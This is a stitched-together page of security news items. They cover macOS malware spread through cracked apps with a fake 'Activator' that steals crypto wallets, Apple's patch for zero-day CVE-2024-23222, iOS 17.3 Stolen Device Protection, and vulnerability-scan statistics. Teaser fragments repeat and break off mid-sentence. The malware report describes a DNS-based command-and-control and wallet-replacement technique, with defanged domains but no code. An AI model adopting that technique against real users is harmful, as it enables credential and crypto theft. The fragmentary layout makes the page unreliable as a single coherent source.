The Cybersecurity and Infrastructure Security Agency (CISA) has added this vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. This means Federal Civilian Executive Branch (FCEB) agencies need to remediate this vulnerability by February 13, 2024 in order to protect their devices against active threats.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Update now! Apple releases patch for zero-day vulnerability 

Cracked software have been observed infecting Apple macOS users with a previously undocumented stealer malware capable of harvesting system information and cryptocurrency wallet data.
Kaspersky, which identified the artifacts in the wild, said they are designed to target machines running macOS Ventura 13.6 and later, indicating the malware's ability to infect Macs on both Intel and

Cracked software have been observed infecting Apple macOS users with a previously undocumented stealer malware capable of harvesting system information and cryptocurrency wallet data.

Kaspersky, which identified the artifacts in the wild, said they are designed to target machines running macOS Ventura 13.6 and later, indicating the malware's ability to infect Macs on both Intel and Apple silicon processor architectures.

The attack chains leverage booby-trapped disk image (DMG) files that include a program named "Activator" and a pirated version of legitimate software such as xScope.

Users who end up opening the DMG files are urged to move both files to the Applications folder and run the Activator component to apply a supposed patch and run the xScope app.

Launching Activator, however, displays a prompt asking the victim to enter the system administrator password, thereby allowing it to execute a Mach-O binary with elevated permissions in order to launch the modified xScope executable.

"The trick was that the malicious actors had taken pre-cracked application versions and added a few bytes to the beginning of the executable, thus disabling it to make the user launch Activator," security researcher Sergey Puzan said.

The next stage entails establishing contact with a command-and-control (C2) server to fetch an encrypted script. The C2 URL, for its part, is constructed by combining words from two hard-coded lists and adding a random sequence of five letters as a third-level domain name.

A DNS request for this domain is then sent to retrieve three DNS TXT records, each containing a Base64-encoded ciphertext fragment that is decrypted and assembled to construct a Python script, which, in turn, establishes persistence and functions as a downloader by reaching out to "apple-health\[.\]org" every 30 seconds to download and execute the main payload.

"This was a fairly interesting and unusual way of contacting a command-and-control server and hiding activity inside traffic, and it guaranteed downloading the payload, as the response message came from the DNS server," Puzan explained, describing it as "seriously ingenious."

The backdoor, actively maintained and updated by the threat actor, is designed to run received commands, gather system metadata, and check for the presence of Exodus and Bitcoin Core wallets on the infected host.

If found, the applications are replaced by trojanized versions downloaded from the domain "apple-analyser\[.\]com" that are equipped to exfiltrate the seed phrase, wallet unlock password, name, and balance to an actor-controlled server.

"The final payload was a backdoor that could run any scripts with administrator privileges, and replace Bitcoin Core and Exodus crypto wallet applications installed on the machine with infected versions that stole secret recovery phrases the moment the wallet was unlocked," Puzan said.

The development comes as cracked software is increasingly becoming a conduit to compromise macOS users with a variety of malware, including Trojan-Proxy and ZuRu.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

"Activator" Alert: MacOS Malware Hides in Cracked Apps, Targeting Crypto Wallets

Apple on Monday released security updates for iOS, iPadOS, macOS, tvOS, and Safari web browser to address a zero-day flaw that has come under active exploitation in the wild.
The issue, tracked as CVE-2024-23222, is a type confusion bug that could be exploited by a threat actor to achieve arbitrary code execution when processing maliciously crafted web content. The tech giant said the problem

Vulnerability / Device Security

Apple on Monday released security updates for iOS, iPadOS, macOS, tvOS, and Safari web browser to address a zero-day flaw that has come under active exploitation in the wild.

The issue, tracked as **CVE-2024-23222**, is a type confusion bug that could be exploited by a threat actor to achieve arbitrary code execution when processing maliciously crafted web content. The tech giant said the problem was fixed with improved checks.

Type confusion vulnerabilities, in general, could be weaponized to perform out-of-bounds memory access, or lead to a crash and arbitrary code execution.

Apple, in a terse advisory, acknowledged that it's "aware of a report that this issue may have been exploited," but did not share any other specifics about the nature of attacks or the threat actors leveraging the shortcoming.

The updates are available for the following devices and operating systems -

*   **iOS 17.3 and iPadOS 17.3** - iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later
*   **iOS 16.7.5 and iPadOS 16.7.5** - iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation, iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
*   **macOS Sonoma 14.3** - Macs running macOS Sonoma
*   **macOS Ventura 13.6.4** - Macs running macOS Ventura
*   **macOS Monterey 12.7.3** - Macs running macOS Monterey
*   **tvOS 17.3** - Apple TV HD and Apple TV 4K (all models)
*   **Safari 17.3** - Macs running macOS Monterey and macOS Ventura

The development marks the first actively exploited zero-day vulnerability to be patched by Apple this year. Last year, the iPhone maker had addressed 20 zero-days that have been employed in real-world attacks.

In addition, Apple has also backported fixes for CVE-2023-42916 and CVE-2023-42917 – patches for which were released in December 2023 – to older devices -

*   **iOS 15.8.1 and iPadOS 15.8.1** - iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

The disclosure also follows a report that Chinese authorities revealed that they have used previously known vulnerabilities in Apple's AirDrop functionality to help law enforcement to identify senders of inappropriate content, using a technique based on rainbow tables.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Issues Patch for Critical Zero-Day in iPhones, Macs - Update Now

Apple’s iOS 17.3 introduces Stolen Device Protection to iPhones, which could stop phone thieves from taking over your accounts. Here’s how to enable it right now.

Apple today launched a new tool for iPhones to help reduce what a thief with your phone and passcode can access. The feature, called Stolen Device Protection, adds extra layers of protection to your iPhone when someone tries to access or change sensitive settings on your device. If someone tries to access passwords stored in Apple’s keychain, for instance, they won’t be able to unless they also use a fingerprint or the phone’s face recognition to prove they’re the legitimate owner.

You don't need to look far to find stories of stolen phones. In London, a phone is stolen every six minutes. Subreddits are littered with people having their phones snatched by thieves. In some of the most extreme cases, crooks can also take the passcodes—forcibly, or by peering over someone’s shoulder—and then steal a phone and unlock it. Social media accounts, passwords, and financial data can all be put at risk.

Stolen Device Protection is included with iOS 17.3, the latest iteration of Apple’s mobile operating system, which was released today. The feature should be high on your list to enable. It better protects your data—without you having to do anything—and has the potential to disrupt thieves. The move from Apple, according to cybersecurity experts, is a positive one and adds to the protections that already accompany passcodes.

The stolen iPhone protection is “likely to act as another barrier and put more pressure on thieves when targeting victims,” says Jake Moore, a global cybersecurity adviser at security firm Eset and a former police computer crime investigator. “Selling phones will always be big business among organized crime groups, but criminals will just need to work harder on their craft now.”

When you turn on Stolen Device Protection, Apple puts extra limits on some settings when your iPhone isn’t at a familiar location, such as your home or work. If someone unlocks your phone and tries to change these settings, they’ll have to use Face ID or Touch ID. So if a thief has your phone and passcode, they won’t be able to change the settings unless they have your biometric information too, which is not straightforward to clone and fool the systems that power them.

These extra checks will appear when someone tries to access passwords or passkeys you’ve saved in iCloud’s keychain, use payment methods saved in Safari, turn off Lost Mode, erase your phone, use your phone in the setup of a new Apple device, apply for a new Apple Card, view your Apple Card’s virtual number, or transfer money with Apple Cash.

There’s also a second layer of checks for even more sensitive information. If your phone is not at a familiar location, Apple will also put in place a one-hour “security delay” after using your biometrics. When this one-hour delay is up, your biometrics are needed again to change the settings. (Your iPhone will still be accessible during this hour.)

This hour delay applies to attempts to change your Apple ID password, sign out of Apple ID, or update Apple ID account security settings, such as removing a trusted device. The delay is also in place if someone tries to remove Face ID or Touch ID accounts, change your iPhone passcode, reset your settings, disable the Find My tool, and turn off Stolen Device Protection itself. If a thief has your phone, there’s a chance they’ll want to change these settings quickly to either take over your phone or online accounts, and the delay may reduce their ability to do so. Moore says the extra hour’s delay adds a “greatly appreciated layer of security.”

Turning on the iPhone’s Stolen Device Protection is simple—it’s just one small toggle in your phone’s settings. You need to make sure your iPhone is updated to iOS 17.3. Open the **Settings** app, scroll to **Face ID & Passcode**, then to **Stolen Device Protection**, and turn the switch on.

With the new feature, Apple is increasingly relying on biometrics, through Touch ID and Face ID, as a way of proving the person with your phone is actually you. “Apple now has a decade of experience with biometrics on hundreds of millions of devices, and its confidence in them seems to be growing,” says Mark Stockley, a cybersecurity expert at security firm Malwarebytes. Traditionally, he says, a password or passcode has been the option that’s turned to when biometrics fail to work. With this new feature, the roles are being reversed, indicating a greater trust in the technologies. “This could be a step towards a passcode-less future,” Stockley says.

While Stolen Device Protection is a step forward, it doesn’t protect everything on your phone if a thief gets hold of it and your passcode. It’s worth making sure your data is backed up, and some apps, such as WhatsApp, will allow you to add another (ideally different) passcode or PIN, on top of your phone’s passcode, before allowing someone into the apps.

Broadly speaking, if your iPhone is stolen—beyond contacting the cops—you’ll also want to visit Apple’s iCloud to take back control of your device. “Start by changing your Apple ID password and ticking the option to sign you out of devices and websites you’re currently logged in to,” Stockley says. Then, within iCloud’s Find Devices settings, you can mark your phone as lost and remotely wipe it. Hopefully, Stolen Device Protection’s features will never need to come to your rescue, but for every person who turns it on, it makes thieves’ lives just that little bit harder.

Apple iOS 17.3: How to Turn on iPhone's New Stolen Device Protection

We analyzed 2,5 million vulnerabilities we discovered in our customer’s assets. This is what we found.

Digging into the data
The dataset we analyze here is representative of a subset of clients that subscribe to our vulnerability scanning services. Assets scanned include those reachable across the Internet, as well as those present on internal networks. The data includes findings for network

**_We analyzed 2,5 million vulnerabilities we discovered in our customer's assets. This is what we found._****Digging into the data**

The dataset we analyze here is representative of a subset of clients that subscribe to our vulnerability scanning services. Assets scanned include those reachable across the Internet, as well as those present on internal networks. The data includes findings for network equipment, desktops, web servers, database servers, and even the odd document printer or scanning device.

The number of organizations in this dataset is smaller (3 less) than the previous dataset used in last year's Security Navigator 2023 and some organizations were replaced by new additions. With the change of organizations comes a different mix of assets, which leaves comparing the previous results akin to comparing apples to oranges (we might be biased), but it's still worth noting similar patterns where possible.

This year, we revisit the menacing vulnerability theme with an eye on the ever-present and lingering tail of unresolved system weaknesses. The waves of newly discovered serious issues are just for our attention with existing unresolved issues, seeming like a hydra that keeps on growing new snaking heads as soon as you dispatch others.

Assessing whether a system is adequately protected is a challenge that requires skill and expertise and can take a lot of time. But we want to learn of any weaknesses beforehand rather than having to deal with the fallout of an unplanned "free pentest" by a random Cy-X group.

**Security Navigator 2024 is Here - Download Now#**

The newly released Security Navigator 2024 offers critical insights into current digital threats, documenting 129,395 incidents and 25,076 confirmed breaches. More than just a report, it serves as a guide to navigating a safer digital landscape.

****What's Inside?**#**

*   📈 **In-Depth Analysis:** Explore trends, attack patterns, and predictions. Learn from case studies in CyberSOC and Pentesting.
*   🔮 **Future-Ready:** Equip yourself with our security predictions and research summary.
*   👁️ **Real-Time Data:** From Dark Net surveillance to industry-specific statistics.

Stay one step ahead in cybersecurity. Your essential guide awaits!

🔗 Get Your Copy Now

**Vulnerability Scanning Findings by Severity**

Examining the severity rating share per unique Finding we see that the bulk of unique Findings, 79%, are classified as 'High' or 'Medium'. However, it is also worth noting that half, 50.4%, of unique Findings are considered 'Critical' or 'High.'

The average number of 'Critical' or 'High' Findings has decreased by 52.17% and 43.83%, respectively, compared to our previously published results. An improvement can also be observed for Findings with severity ratings 'Medium' and 'Low' being down 29.92% and 28.76%. As this report uses a slightly different sample of clients to last year, a YoY comparison has limited value, but we see evidence that clients are responding well to the findings we report, resulting in an overall improvement.

The majority of Findings (78%) rated 'Critical' or 'High' are 30 days or younger (when looking at a 120-day window). Conversely, 18% of all findings rated 'Critical' or 'High' are 150-days or older. From a prioritization perspective, 'Critical' or 'High' real findings seem to be dealt with swiftly, but some residual still accumulates over time. We see, therefore, that unresolved Findings continue to grow older. Indeed, ~35% of all unique CVEs are from findings 120 days or older.

The chart above shows the long tail of unresolved real findings. Note the first remarkable long tail peak around 660 days and the second one at 1380 days (3 years and 10 months).

**A window of opportunity**

The high average numbers of 'Critical' and 'High' findings are largely influenced by assets running Microsoft Windows or Microsoft Windows Server operating systems. Assets running operating systems other than Microsoft, such as Linux-based OS, are present, but these are reported proportionally far less.

We should note, however, that the 'Critical' or 'High' findings associated with assets running Windows are not necessarily vulnerabilities in the operating system but can also be related to applications running on the asset.

It is perhaps understandable that unsupported Microsoft Windows and Windows Server versions are prominent here, but it is surprising to find more recent versions of these operating systems with severities rated as 'Critical' or 'High'.

**Industry perspective**

We are using NAICS for our industry classification. The results here only consider Findings based on scans of hosts rather than services such as web applications. The average unique real Finding per unique asset is 31.74 across all organizations, denoted by the dashed horizontal line in the chart below.

Our clients in the Construction industry appear to be performing exceptionally well compared to clients in other industries, with an average of 12.12 Findings per Asset. At the opposite end of the spectrum, we have the Mining, Quarrying, and Oil and Gas industries, where we report an average of 76.25 unique findings per asset. Clients in Public Administration surprised us by outperforming Finance and Insurance with an average of 35.3 Findings per Asset, compared with 43.27, despite the larger number of Assets. Of course, these values are derived from the set of clients present in our sample and may not represent the universal reality.

When comparing the average severity per unique asset per Industry, we see a mixed picture. We can ignore Health Care and Social Assistance and Information, with a relatively small unique asset count, that results in averages that are disproportionate in relation to other Industries.

Our overall Industry average for Severity rating High is 21.93 and Mining, Quarrying and Oil and Gas Extraction have more than double that average.

Similarly, Finance and Insurance with Accommodation and Food Services also overshot the overall average by 10.2 and 3.4 findings per unique asset, respectively. The same three Industries exceeded the overall average for findings rated Critical, with Accommodation and Food Servers doing so by almost a factor of 3.

**Vulnerability is getting old**

As we revisit the menacing vulnerability theme this year, we once again look suspiciously at the ever-present and lingering tale of unresolved system weaknesses that are just getting older. We assessed over 2.5m vulnerability findings that we reported to our clients and over 1,500 reports from our professional ethical hackers to understand the current state of security vulnerabilities and consider their role and effectiveness as a tool for prioritization.

The bulk of unique Findings reported by our scanning teams - 79% - are classified as 'High' or 'Medium,' and 18% of all serious findings are 150 days or older. Though these are generally dealt with more swiftly than others, some residuals still accumulate over time. While most findings we identify are resolved after 90 days, 35% of all findings we report persist for 120 days or longer. And way too many are never addressed at all.

Our scanning results illuminate the persistent problem of unpatched vulnerabilities. Meanwhile, our Ethical Hacking teams more frequently encounter newer applications and systems built on contemporary platforms, frameworks, and languages.

The role of the Ethical Hacker is to conduct Penetration Tests – to emulate a malicious attacker and assess a system, application, device, or even people for vulnerabilities that could be used to gain access or deny access to IT resources.

Penetration Testing is generally considered a component of Vulnerability Management but could also be seen as a form of Threat Intelligence that businesses should leverage as part of their proactive defense strategy.

17.67% of findings our Ethical Hackers reported were rated as 'Serious', but, on a brighter note, hackers must work harder today to discover them than they had to in the past.

This is just an excerpt of the analysis. More details on our analysis of vulnerabilities and Pentesting (as well as a ton of other interesting research topics like VERIS categorization of the incidents handled in our CyberSOCs, Cyber Extortion statistics and an analysis of Hacktivism) can be found in the **Security Navigator**. Just fill in the form and get your download. It's worth it!

**Note:** _This informative piece has been expertly crafted and generously shared by Charl van der Walt, Head of the Security Research Center, Orange Cyberdefense._

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#apple